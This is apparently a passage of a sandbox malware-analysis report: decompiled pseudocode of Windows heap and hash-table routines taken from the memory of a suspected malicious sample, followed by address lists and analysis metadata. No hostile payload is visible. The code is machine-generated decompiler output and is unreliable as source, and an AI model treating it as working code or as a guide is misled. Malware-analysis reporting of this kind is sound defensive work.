                                                                                                                                                                            							_t170 = 0x7ffe0380;
                                                                                                                                                                            							if(_t102 != 0) {
                                                                                                                                                                            								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t105 = 0x7ffe0380;
                                                                                                                                                                            							}
                                                                                                                                                                            							if( *_t105 != 0) {
                                                                                                                                                                            								_t106 =  *[fs:0x30];
                                                                                                                                                                            								__eflags =  *(_t106 + 0x240) & 0x00000001;
                                                                                                                                                                            								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
                                                                                                                                                                            									_t121 = E1D833C40();
                                                                                                                                                                            									__eflags = _t121;
                                                                                                                                                                            									if(_t121 != 0) {
                                                                                                                                                                            										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                                                            										__eflags = _t170;
                                                                                                                                                                            									}
                                                                                                                                                                            									 *((short*)(_t176 + 0x2a)) = 0x1023;
                                                                                                                                                                            									_push(_t176 + 0x24);
                                                                                                                                                                            									_push(4);
                                                                                                                                                                            									_push(0x402);
                                                                                                                                                                            									_push( *_t170 & 0x000000ff);
                                                                                                                                                                            									 *(_t176 + 0x54) = _t161;
                                                                                                                                                                            									E1D862F90();
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t107 = E1D833C40();
                                                                                                                                                                            							_t171 = 0x7ffe038a;
                                                                                                                                                                            							if(_t107 != 0) {
                                                                                                                                                                            								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t110 = 0x7ffe038a;
                                                                                                                                                                            							}
                                                                                                                                                                            							if( *_t110 != 0) {
                                                                                                                                                                            								_t111 = E1D833C40();
                                                                                                                                                                            								__eflags = _t111;
                                                                                                                                                                            								if(_t111 != 0) {
                                                                                                                                                                            									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                                                                            									__eflags = _t171;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *((short*)(_t176 + 0x4e)) = 0x1023;
                                                                                                                                                                            								_push(_t176 + 0x48);
                                                                                                                                                                            								_push(4);
                                                                                                                                                                            								_push(0x402);
                                                                                                                                                                            								_push( *_t171 & 0x000000ff);
                                                                                                                                                                            								_v8 = _t161;
                                                                                                                                                                            								E1D862F90();
                                                                                                                                                                            							}
                                                                                                                                                                            							if(E1D833C40() != 0) {
                                                                                                                                                                            								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t118 = 0x7ffe0388;
                                                                                                                                                                            							}
                                                                                                                                                                            							if( *_t118 != 0) {
                                                                                                                                                                            								E1D8DD9C6(_t161);
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L26;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}


















































                                                                                                                                                                            0x1d81f8b0
                                                                                                                                                                            0x1d81f8b8
                                                                                                                                                                            0x1d81f8c2
                                                                                                                                                                            0x1d81f8c6
                                                                                                                                                                            0x1d81f8c9
                                                                                                                                                                            0x1d81f8ce
                                                                                                                                                                            0x1d87e467
                                                                                                                                                                            0x1d87e46e
                                                                                                                                                                            0x1d87e474
                                                                                                                                                                            0x1d87e47a
                                                                                                                                                                            0x1d87e47e
                                                                                                                                                                            0x1d87e49d
                                                                                                                                                                            0x1d87e4a2
                                                                                                                                                                            0x1d87e480
                                                                                                                                                                            0x1d87e495
                                                                                                                                                                            0x1d87e49a
                                                                                                                                                                            0x1d87e4a8
                                                                                                                                                                            0x1d87e4ad
                                                                                                                                                                            0x1d87e4b2
                                                                                                                                                                            0x1d87e4ba
                                                                                                                                                                            0x1d87e4c2
                                                                                                                                                                            0x1d87e4c3
                                                                                                                                                                            0x1d87e4c3
                                                                                                                                                                            0x1d87e4ba
                                                                                                                                                                            0x1d81f9f6
                                                                                                                                                                            0x1d81f9f6
                                                                                                                                                                            0x1d81f9f8
                                                                                                                                                                            0x1d81f9fc
                                                                                                                                                                            0x1d81f9fd
                                                                                                                                                                            0x1d81f9fe
                                                                                                                                                                            0x1d81fa09
                                                                                                                                                                            0x1d81fa09
                                                                                                                                                                            0x1d81f8db
                                                                                                                                                                            0x1d87e4cd
                                                                                                                                                                            0x1d87e4d3
                                                                                                                                                                            0x1d87e4d6
                                                                                                                                                                            0x1d81fa37
                                                                                                                                                                            0x1d81fa37
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d81fa37
                                                                                                                                                                            0x1d87e4dc
                                                                                                                                                                            0x1d87e4e1
                                                                                                                                                                            0x1d87e4e3
                                                                                                                                                                            0x1d87e4e9
                                                                                                                                                                            0x1d87e4eb
                                                                                                                                                                            0x1d87e4eb
                                                                                                                                                                            0x1d87e4f2
                                                                                                                                                                            0x1d87e4f9
                                                                                                                                                                            0x1d87e504
                                                                                                                                                                            0x1d87e505
                                                                                                                                                                            0x1d87e50c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87e50c
                                                                                                                                                                            0x1d81f8e8
                                                                                                                                                                            0x1d87e516
                                                                                                                                                                            0x1d87e51f
                                                                                                                                                                            0x1d87e525
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87e525
                                                                                                                                                                            0x1d81f8ee
                                                                                                                                                                            0x1d81f8ee
                                                                                                                                                                            0x1d81f8f5
                                                                                                                                                                            0x1d87e530
                                                                                                                                                                            0x1d87e532
                                                                                                                                                                            0x1d87e532
                                                                                                                                                                            0x1d81f8fd
                                                                                                                                                                            0x1d81f909
                                                                                                                                                                            0x1d87e53c
                                                                                                                                                                            0x1d87e543
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87e54b
                                                                                                                                                                            0x1d87e550
                                                                                                                                                                            0x1d87e552
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d81f90f
                                                                                                                                                                            0x1d81f90f
                                                                                                                                                                            0x1d81f918
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d81f91e
                                                                                                                                                                            0x1d81f924
                                                                                                                                                                            0x1d81f92b
                                                                                                                                                                            0x1d81f930
                                                                                                                                                                            0x1d81f931
                                                                                                                                                                            0x1d81f936
                                                                                                                                                                            0x1d81f93c
                                                                                                                                                                            0x1d81f93e
                                                                                                                                                                            0x1d87e55d
                                                                                                                                                                            0x1d87e55f
                                                                                                                                                                            0x1d87e563
                                                                                                                                                                            0x1d87e56a
                                                                                                                                                                            0x1d87e578
                                                                                                                                                                            0x1d87e57c
                                                                                                                                                                            0x1d87e581
                                                                                                                                                                            0x1d87e586
                                                                                                                                                                            0x1d87e588
                                                                                                                                                                            0x1d87e59a
                                                                                                                                                                            0x1d87e58a
                                                                                                                                                                            0x1d87e593
                                                                                                                                                                            0x1d87e593
                                                                                                                                                                            0x1d87e59f
                                                                                                                                                                            0x1d87e5a2
                                                                                                                                                                            0x1d87e5a8
                                                                                                                                                                            0x1d87e5ae
                                                                                                                                                                            0x1d87e5ae
                                                                                                                                                                            0x1d87e5b3
                                                                                                                                                                            0x1d87e5b3
                                                                                                                                                                            0x1d81f94d
                                                                                                                                                                            0x1d81fa0c
                                                                                                                                                                            0x1d81f953
                                                                                                                                                                            0x1d81f953
                                                                                                                                                                            0x1d81f953
                                                                                                                                                                            0x1d81f957
                                                                                                                                                                            0x1d81fa17
                                                                                                                                                                            0x1d81fa1b
                                                                                                                                                                            0x1d81fa28
                                                                                                                                                                            0x1d81fa2d
                                                                                                                                                                            0x1d81fa2d
                                                                                                                                                                            0x1d81f95d
                                                                                                                                                                            0x1d81f965
                                                                                                                                                                            0x1d87e5c7
                                                                                                                                                                            0x1d87e5cc
                                                                                                                                                                            0x1d87e5ce
                                                                                                                                                                            0x1d87e5d3
                                                                                                                                                                            0x1d87e5d3
                                                                                                                                                                            0x1d81f96f
                                                                                                                                                                            0x1d81f981
                                                                                                                                                                            0x1d81f981
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d81f987
                                                                                                                                                                            0x1d81f98d
                                                                                                                                                                            0x1d81f992
                                                                                                                                                                            0x1d81f999
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d81f99b
                                                                                                                                                                            0x1d81f99b
                                                                                                                                                                            0x1d81f9a0
                                                                                                                                                                            0x1d81f9ac
                                                                                                                                                                            0x1d87e5e3
                                                                                                                                                                            0x1d81f9b2
                                                                                                                                                                            0x1d81f9b2
                                                                                                                                                                            0x1d81f9b2
                                                                                                                                                                            0x1d81f9b7
                                                                                                                                                                            0x1d87e5ea
                                                                                                                                                                            0x1d87e5f0
                                                                                                                                                                            0x1d87e5f7
                                                                                                                                                                            0x1d87e5fd
                                                                                                                                                                            0x1d87e602
                                                                                                                                                                            0x1d87e604
                                                                                                                                                                            0x1d87e60f
                                                                                                                                                                            0x1d87e60f
                                                                                                                                                                            0x1d87e60f
                                                                                                                                                                            0x1d87e618
                                                                                                                                                                            0x1d87e621
                                                                                                                                                                            0x1d87e622
                                                                                                                                                                            0x1d87e624
                                                                                                                                                                            0x1d87e62c
                                                                                                                                                                            0x1d87e62d
                                                                                                                                                                            0x1d87e631
                                                                                                                                                                            0x1d87e631
                                                                                                                                                                            0x1d87e5f7
                                                                                                                                                                            0x1d81f9bd
                                                                                                                                                                            0x1d81f9c2
                                                                                                                                                                            0x1d81f9ce
                                                                                                                                                                            0x1d87e644
                                                                                                                                                                            0x1d81f9d4
                                                                                                                                                                            0x1d81f9d4
                                                                                                                                                                            0x1d81f9d4
                                                                                                                                                                            0x1d81f9d9
                                                                                                                                                                            0x1d87e64b
                                                                                                                                                                            0x1d87e650
                                                                                                                                                                            0x1d87e652
                                                                                                                                                                            0x1d87e65d
                                                                                                                                                                            0x1d87e65d
                                                                                                                                                                            0x1d87e65d
                                                                                                                                                                            0x1d87e666
                                                                                                                                                                            0x1d87e66f
                                                                                                                                                                            0x1d87e670
                                                                                                                                                                            0x1d87e672
                                                                                                                                                                            0x1d87e67a
                                                                                                                                                                            0x1d87e67b
                                                                                                                                                                            0x1d87e67f
                                                                                                                                                                            0x1d87e67f
                                                                                                                                                                            0x1d81f9e6
                                                                                                                                                                            0x1d87e692
                                                                                                                                                                            0x1d81f9ec
                                                                                                                                                                            0x1d81f9ec
                                                                                                                                                                            0x1d81f9ec
                                                                                                                                                                            0x1d81f9f4
                                                                                                                                                                            0x1d81fa3d
                                                                                                                                                                            0x1d81fa3d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d81f9f4
                                                                                                                                                                            0x1d81f999
                                                                                                                                                                            0x1d81f918

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 3446177414-3610490719
                                                                                                                                                                            • Opcode ID: 0312c94eb2653e362ad1b7a37e38f35a3c4fae463bb89e7c5236a23dc43fc3fb
                                                                                                                                                                            • Instruction ID: 3ce99e48f7c6aef7d017c5f948b7fb24cc8847f7d95de6054d48d0c7973a87ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 0312c94eb2653e362ad1b7a37e38f35a3c4fae463bb89e7c5236a23dc43fc3fb
                                                                                                                                                                            • Instruction Fuzzy Hash: FA910373708656AFC316DB28C880B3EB7A5BF94B54F014559FA448F291DB38E849C793
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                                            			E1D8FACEB(signed int __ecx, signed int* __edx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int* _v12;
                                                                                                                                                                            				signed char _v13;
                                                                                                                                                                            				signed char _v14;
                                                                                                                                                                            				signed char _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v21;
                                                                                                                                                                            				signed int _v22;
                                                                                                                                                                            				signed char _v24;
                                                                                                                                                                            				signed char _v25;
                                                                                                                                                                            				signed char _v26;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int* _t146;
                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                            				signed int _t151;
                                                                                                                                                                            				signed int _t167;
                                                                                                                                                                            				signed int _t169;
                                                                                                                                                                            				signed int _t173;
                                                                                                                                                                            				signed char _t176;
                                                                                                                                                                            				signed int _t195;
                                                                                                                                                                            				void* _t211;
                                                                                                                                                                            				signed int _t250;
                                                                                                                                                                            				signed int _t251;
                                                                                                                                                                            				signed int _t253;
                                                                                                                                                                            				intOrPtr* _t254;
                                                                                                                                                                            				signed int _t261;
                                                                                                                                                                            				signed char _t267;
                                                                                                                                                                            				signed char _t274;
                                                                                                                                                                            				intOrPtr _t283;
                                                                                                                                                                            				signed int _t285;
                                                                                                                                                                            				signed int _t288;
                                                                                                                                                                            				signed int _t292;
                                                                                                                                                                            				intOrPtr _t295;
                                                                                                                                                                            				signed int _t297;
                                                                                                                                                                            				signed int* _t304;
                                                                                                                                                                            				signed char _t305;
                                                                                                                                                                            				void* _t333;
                                                                                                                                                                            				unsigned int _t335;
                                                                                                                                                                            				signed int _t336;
                                                                                                                                                                            				signed char _t337;
                                                                                                                                                                            				unsigned int _t338;
                                                                                                                                                                            				signed int _t339;
                                                                                                                                                                            				signed int _t343;
                                                                                                                                                                            				signed int _t345;
                                                                                                                                                                            				intOrPtr _t349;
                                                                                                                                                                            				signed char _t351;
                                                                                                                                                                            				signed int _t353;
                                                                                                                                                                            				signed char _t354;
                                                                                                                                                                            				unsigned int _t355;
                                                                                                                                                                            				unsigned int _t356;
                                                                                                                                                                            				signed int _t358;
                                                                                                                                                                            				unsigned int _t360;
                                                                                                                                                                            				void* _t361;
                                                                                                                                                                            				signed int _t362;
                                                                                                                                                                            				signed int _t364;
                                                                                                                                                                            				intOrPtr* _t365;
                                                                                                                                                                            				signed int _t366;
                                                                                                                                                                            				signed int _t367;
                                                                                                                                                                            				void* _t368;
                                                                                                                                                                            				void* _t369;
                                                                                                                                                                            				void* _t370;
                                                                                                                                                                            				void* _t371;
                                                                                                                                                                            				void* _t372;
                                                                                                                                                                            				signed char* _t374;
                                                                                                                                                                            				signed int _t375;
                                                                                                                                                                            				signed int _t377;
                                                                                                                                                                            				signed int _t378;
                                                                                                                                                                            				signed int _t380;
                                                                                                                                                                            				signed char _t381;
                                                                                                                                                                            				unsigned int _t383;
                                                                                                                                                                            
                                                                                                                                                                            				_t146 = __edx;
                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                            				_t251 = 0x4cb2f;
                                                                                                                                                                            				_t3 = _t146 + 4; // 0x8b0775c0
                                                                                                                                                                            				_t374 =  *_t3;
                                                                                                                                                                            				_t360 =  *__edx << 2;
                                                                                                                                                                            				if(_t360 < 8) {
                                                                                                                                                                            					L3:
                                                                                                                                                                            					_t361 = _t360 - 1;
                                                                                                                                                                            					if(_t361 == 0) {
                                                                                                                                                                            						L16:
                                                                                                                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                                                                                                                            						L17:
                                                                                                                                                                            						_t375 = _v8;
                                                                                                                                                                            						_t12 = _t375 + 0x1c; // 0x1d8fabd2
                                                                                                                                                                            						_v24 = _t12;
                                                                                                                                                                            						_t149 = L1D8253C0(_t12);
                                                                                                                                                                            						_t362 = 0;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L18:
                                                                                                                                                                            							_t14 = _t375 + 4; // 0x8bf8558b
                                                                                                                                                                            							_t335 =  *_t14;
                                                                                                                                                                            							_t151 = (_t149 | 0xffffffff) << (_t335 & 0x0000001f);
                                                                                                                                                                            							_t267 = _t251 & _t151;
                                                                                                                                                                            							_v28 = _t151;
                                                                                                                                                                            							_v20 = _t267;
                                                                                                                                                                            							_v16 = _t267;
                                                                                                                                                                            							if(_t362 != 0) {
                                                                                                                                                                            								goto L21;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t356 = _t335 >> 5;
                                                                                                                                                                            							if(_t356 == 0) {
                                                                                                                                                                            								_t362 = 0;
                                                                                                                                                                            								L30:
                                                                                                                                                                            								if(_t362 == 0) {
                                                                                                                                                                            									L34:
                                                                                                                                                                            									_t33 = _t375 + 0x1c; // 0x1d8fabd2
                                                                                                                                                                            									E1D8252F0(_t267, _t33);
                                                                                                                                                                            									_t35 = _t375 + 0x28; // 0x8b0a74f6
                                                                                                                                                                            									_t36 = _t375 + 0x20; // 0x8bb372c7
                                                                                                                                                                            									 *0x1d9191e0(0xc +  *_v12 * 4,  *_t35);
                                                                                                                                                                            									_t337 =  *((intOrPtr*)( *_t36))();
                                                                                                                                                                            									_v16 = _t337;
                                                                                                                                                                            									if(_t337 != 0) {
                                                                                                                                                                            										asm("stosd");
                                                                                                                                                                            										asm("stosd");
                                                                                                                                                                            										asm("stosd");
                                                                                                                                                                            										 *(_t337 + 8) =  *(_t337 + 8) & 0xff000001 | 0x00000001;
                                                                                                                                                                            										 *((char*)(_t337 + 0xb)) =  *_v12;
                                                                                                                                                                            										 *(_t337 + 4) = _t251;
                                                                                                                                                                            										_t46 = _t337 + 0xc; // 0xc
                                                                                                                                                                            										_t167 = L1D832330(E1D8688C0(_t46, _v12[1],  *_v12 << 2), _v24);
                                                                                                                                                                            										_t377 = _v8;
                                                                                                                                                                            										_t364 = 0;
                                                                                                                                                                            										do {
                                                                                                                                                                            											_t49 = _t377 + 4; // 0x8bf8558b
                                                                                                                                                                            											_t338 =  *_t49;
                                                                                                                                                                            											_t169 = (_t167 | 0xffffffff) << (_t338 & 0x0000001f);
                                                                                                                                                                            											_v28 = _t169;
                                                                                                                                                                            											_t274 = _t169 & _t251;
                                                                                                                                                                            											_v20 = _t274;
                                                                                                                                                                            											_v24 = _t274;
                                                                                                                                                                            											if(_t364 != 0) {
                                                                                                                                                                            												L40:
                                                                                                                                                                            												_t339 = _v28;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													_t364 =  *_t364;
                                                                                                                                                                            													if((_t364 & 0x00000001) != 0) {
                                                                                                                                                                            														break;
                                                                                                                                                                            													}
                                                                                                                                                                            													if(_t274 == ( *(_t364 + 4) & _t339)) {
                                                                                                                                                                            														L45:
                                                                                                                                                                            														if(_t364 == 0) {
                                                                                                                                                                            															L52:
                                                                                                                                                                            															_t253 = _t377;
                                                                                                                                                                            															_t68 = _t253 + 0x28; // 0x8b0a74f6
                                                                                                                                                                            															_t69 = _t253 + 4; // 0x8bf8558b
                                                                                                                                                                            															_t378 =  *_t69;
                                                                                                                                                                            															_t70 = _t253 + 0x20; // 0x8bb372c7
                                                                                                                                                                            															_t365 =  *_t70;
                                                                                                                                                                            															_v28 =  *_t68;
                                                                                                                                                                            															_t72 = _t253 + 0x24; // 0x85f633fe
                                                                                                                                                                            															_v40 =  *_t72;
                                                                                                                                                                            															_t173 = _t378 >> 5;
                                                                                                                                                                            															if( *_t253 < _t173 + _t173) {
                                                                                                                                                                            																L73:
                                                                                                                                                                            																_t380 = _v16;
                                                                                                                                                                            																_t364 = _t380;
                                                                                                                                                                            																_t176 = (_t173 | 0xffffffff) << (_t378 & 0x0000001f) &  *(_t380 + 4);
                                                                                                                                                                            																_v40 = _t176;
                                                                                                                                                                            																_v28 = _t176;
                                                                                                                                                                            																_t343 = (_t378 >> 0x00000005) - 0x00000001 & ((((_t176 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_v40 & 0x000000ff)) * 0x00000025 + (_v26 & 0x000000ff)) * 0x00000025 + (_v25 & 0x000000ff);
                                                                                                                                                                            																_t136 = _t253 + 8; // 0xc183f44d
                                                                                                                                                                            																_t283 =  *_t136;
                                                                                                                                                                            																 *_t380 =  *(_t283 + _t343 * 4);
                                                                                                                                                                            																 *(_t283 + _t343 * 4) = _t380;
                                                                                                                                                                            																 *_t253 =  *_t253 + 1;
                                                                                                                                                                            																_t381 = 0;
                                                                                                                                                                            																L74:
                                                                                                                                                                            																_t141 = _t253 + 0x1c; // 0x1d8fabd2
                                                                                                                                                                            																E1D8324D0(_t141);
                                                                                                                                                                            																if(_t381 != 0) {
                                                                                                                                                                            																	_t142 = _t253 + 0x28; // 0x8b0a74f6
                                                                                                                                                                            																	_t143 = _t253 + 0x24; // 0x85f633fe
                                                                                                                                                                            																	 *0x1d9191e0(_t381,  *_t142);
                                                                                                                                                                            																	 *((intOrPtr*)( *_t143))();
                                                                                                                                                                            																}
                                                                                                                                                                            																L76:
                                                                                                                                                                            																return _t364;
                                                                                                                                                                            															}
                                                                                                                                                                            															_t285 = 2;
                                                                                                                                                                            															_t173 = E1D854CF8( &_v24, _t173 * _t285, _t173 * _t285 >> 0x20);
                                                                                                                                                                            															if(_t173 < 0) {
                                                                                                                                                                            																goto L73;
                                                                                                                                                                            															}
                                                                                                                                                                            															_t383 = _v24;
                                                                                                                                                                            															if(_t383 < 4) {
                                                                                                                                                                            																_t383 = 4;
                                                                                                                                                                            															}
                                                                                                                                                                            															 *0x1d9191e0(_t383 << 2, _v28);
                                                                                                                                                                            															_t173 =  *_t365();
                                                                                                                                                                            															_t345 = _t173;
                                                                                                                                                                            															_v12 = _t345;
                                                                                                                                                                            															if(_t345 == 0) {
                                                                                                                                                                            																_t144 = _t253 + 4; // 0x8bf8558b
                                                                                                                                                                            																_t378 =  *_t144;
                                                                                                                                                                            																if(_t378 >= 0x20) {
                                                                                                                                                                            																	goto L73;
                                                                                                                                                                            																}
                                                                                                                                                                            																_t381 = _v16;
                                                                                                                                                                            																_t364 = 0;
                                                                                                                                                                            																goto L74;
                                                                                                                                                                            															} else {
                                                                                                                                                                            																_t83 = _t383 - 1; // 0x3
                                                                                                                                                                            																_t288 = _t83;
                                                                                                                                                                            																if((_t383 & _t288) == 0) {
                                                                                                                                                                            																	L61:
                                                                                                                                                                            																	if(_t383 > 0x4000000) {
                                                                                                                                                                            																		_t383 = 0x4000000;
                                                                                                                                                                            																	}
                                                                                                                                                                            																	_t366 = _t345;
                                                                                                                                                                            																	_v24 = _v24 & 0x00000000;
                                                                                                                                                                            																	_t195 = _t253 | 0x00000001;
                                                                                                                                                                            																	asm("sbb ecx, ecx");
                                                                                                                                                                            																	_t292 =  !( &(_v12[_t383])) & _t383 << 0x00000002 >> 0x00000002;
                                                                                                                                                                            																	if(_t292 <= 0) {
                                                                                                                                                                            																		L66:
                                                                                                                                                                            																		_t92 = _t253 + 4; // 0x8bf8558b
                                                                                                                                                                            																		_t367 = 0;
                                                                                                                                                                            																		_v32 = (_t195 | 0xffffffff) << ( *_t92 & 0x0000001f);
                                                                                                                                                                            																		if(( *(_t253 + 4) & 0xffffffe0) <= 0) {
                                                                                                                                                                            																			L71:
                                                                                                                                                                            																			_t121 = _t253 + 8; // 0xc183f44d
                                                                                                                                                                            																			_t295 =  *_t121;
                                                                                                                                                                            																			 *((intOrPtr*)(_t253 + 8)) = _v12;
                                                                                                                                                                            																			_t124 = _t253 + 4; // 0x8bf8558b
                                                                                                                                                                            																			_t173 =  *_t124 & 0x0000001f;
                                                                                                                                                                            																			_t378 = _t383 << 0x00000005 | _t173;
                                                                                                                                                                            																			 *(_t253 + 4) = _t378;
                                                                                                                                                                            																			if(_t295 != 0) {
                                                                                                                                                                            																				 *0x1d9191e0(_t295, _v28);
                                                                                                                                                                            																				_t173 =  *_v40();
                                                                                                                                                                            																				_t128 = _t253 + 4; // 0x8bf8558b
                                                                                                                                                                            																				_t378 =  *_t128;
                                                                                                                                                                            																			}
                                                                                                                                                                            																			goto L73;
                                                                                                                                                                            																		} else {
                                                                                                                                                                            																			goto L67;
                                                                                                                                                                            																		}
                                                                                                                                                                            																		do {
                                                                                                                                                                            																			L67:
                                                                                                                                                                            																			_t97 = _t253 + 8; // 0xc183f44d
                                                                                                                                                                            																			_t349 =  *_t97;
                                                                                                                                                                            																			_v36 = _t349;
                                                                                                                                                                            																			while(1) {
                                                                                                                                                                            																				_t297 =  *(_t349 + _t367 * 4);
                                                                                                                                                                            																				_v20 = _t297;
                                                                                                                                                                            																				if((_t297 & 0x00000001) != 0) {
                                                                                                                                                                            																					goto L70;
                                                                                                                                                                            																				}
                                                                                                                                                                            																				 *(_t349 + _t367 * 4) =  *_t297;
                                                                                                                                                                            																				_t351 =  *(_t297 + 4) & _v32;
                                                                                                                                                                            																				_t254 = _v20;
                                                                                                                                                                            																				_v24 = _t351;
                                                                                                                                                                            																				_t353 = _t383 - 0x00000001 & ((((_t351 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_t351 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025 + (_v21 & 0x000000ff);
                                                                                                                                                                            																				_t304 = _v12;
                                                                                                                                                                            																				 *_t254 =  *((intOrPtr*)(_t304 + _t353 * 4));
                                                                                                                                                                            																				 *((intOrPtr*)(_t304 + _t353 * 4)) = _t254;
                                                                                                                                                                            																				_t349 = _v36;
                                                                                                                                                                            																			}
                                                                                                                                                                            																			L70:
                                                                                                                                                                            																			_t253 = _v8;
                                                                                                                                                                            																			_t367 = _t367 + 1;
                                                                                                                                                                            																			_t120 = _t253 + 4; // 0x8bf8558b
                                                                                                                                                                            																		} while (_t367 <  *_t120 >> 5);
                                                                                                                                                                            																		goto L71;
                                                                                                                                                                            																	} else {
                                                                                                                                                                            																		_t354 = _v24;
                                                                                                                                                                            																		do {
                                                                                                                                                                            																			_t354 = _t354 + 1;
                                                                                                                                                                            																			 *_t366 = _t195;
                                                                                                                                                                            																			_t366 = _t366 + 4;
                                                                                                                                                                            																		} while (_t354 < _t292);
                                                                                                                                                                            																		goto L66;
                                                                                                                                                                            																	}
                                                                                                                                                                            																}
                                                                                                                                                                            																_t305 = _t288 | 0xffffffff;
                                                                                                                                                                            																if(_t383 == 0) {
                                                                                                                                                                            																	L60:
                                                                                                                                                                            																	_t383 = 1 << _t305;
                                                                                                                                                                            																	goto L61;
                                                                                                                                                                            																} else {
                                                                                                                                                                            																	goto L59;
                                                                                                                                                                            																}
                                                                                                                                                                            																do {
                                                                                                                                                                            																	L59:
                                                                                                                                                                            																	_t305 = _t305 + 1;
                                                                                                                                                                            																	_t383 = _t383 >> 1;
                                                                                                                                                                            																} while (_t383 != 0);
                                                                                                                                                                            																goto L60;
                                                                                                                                                                            															}
                                                                                                                                                                            														}
                                                                                                                                                                            														goto L46;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												_t364 = 0;
                                                                                                                                                                            												goto L45;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t355 = _t338 >> 5;
                                                                                                                                                                            											if(_t355 == 0) {
                                                                                                                                                                            												_t364 = 0;
                                                                                                                                                                            												L49:
                                                                                                                                                                            												if(_t364 == 0) {
                                                                                                                                                                            													goto L52;
                                                                                                                                                                            												}
                                                                                                                                                                            												_t66 = _t364 + 8; // 0x8
                                                                                                                                                                            												_t211 = E1D8FAC6F(_t66);
                                                                                                                                                                            												_t253 = _t377;
                                                                                                                                                                            												_t381 = _v16;
                                                                                                                                                                            												if(_t211 == 0) {
                                                                                                                                                                            													_t364 = 0;
                                                                                                                                                                            												}
                                                                                                                                                                            												goto L74;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t56 = _t355 - 1; // 0x8bf8558a
                                                                                                                                                                            											_t57 = _t377 + 8; // 0xc183f44d
                                                                                                                                                                            											_t364 =  *_t57 + (_t56 & (_v21 & 0x000000ff) + 0x164b2f3f + (((_t274 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025) * 4;
                                                                                                                                                                            											_t274 = _v20;
                                                                                                                                                                            											goto L40;
                                                                                                                                                                            											L46:
                                                                                                                                                                            											_t167 = E1D8FACB2(_t364, _v12);
                                                                                                                                                                            										} while (_t167 == 0);
                                                                                                                                                                            										goto L49;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t364 = 0;
                                                                                                                                                                            									goto L76;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t31 = _t362 + 8; // 0x8
                                                                                                                                                                            								_t314 = _t31;
                                                                                                                                                                            								if(E1D8FAC6F(_t31) == 0) {
                                                                                                                                                                            									_t364 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            								E1D8252F0(_t314, _v24);
                                                                                                                                                                            								goto L76;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t21 = _t356 - 1; // 0x8bf8558a
                                                                                                                                                                            							_t22 = _t375 + 8; // 0xc183f44d
                                                                                                                                                                            							_t362 =  *_t22 + (_t21 & (_v13 & 0x000000ff) + 0x164b2f3f + (((_t267 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v14 & 0x000000ff)) * 0x00000025) * 4;
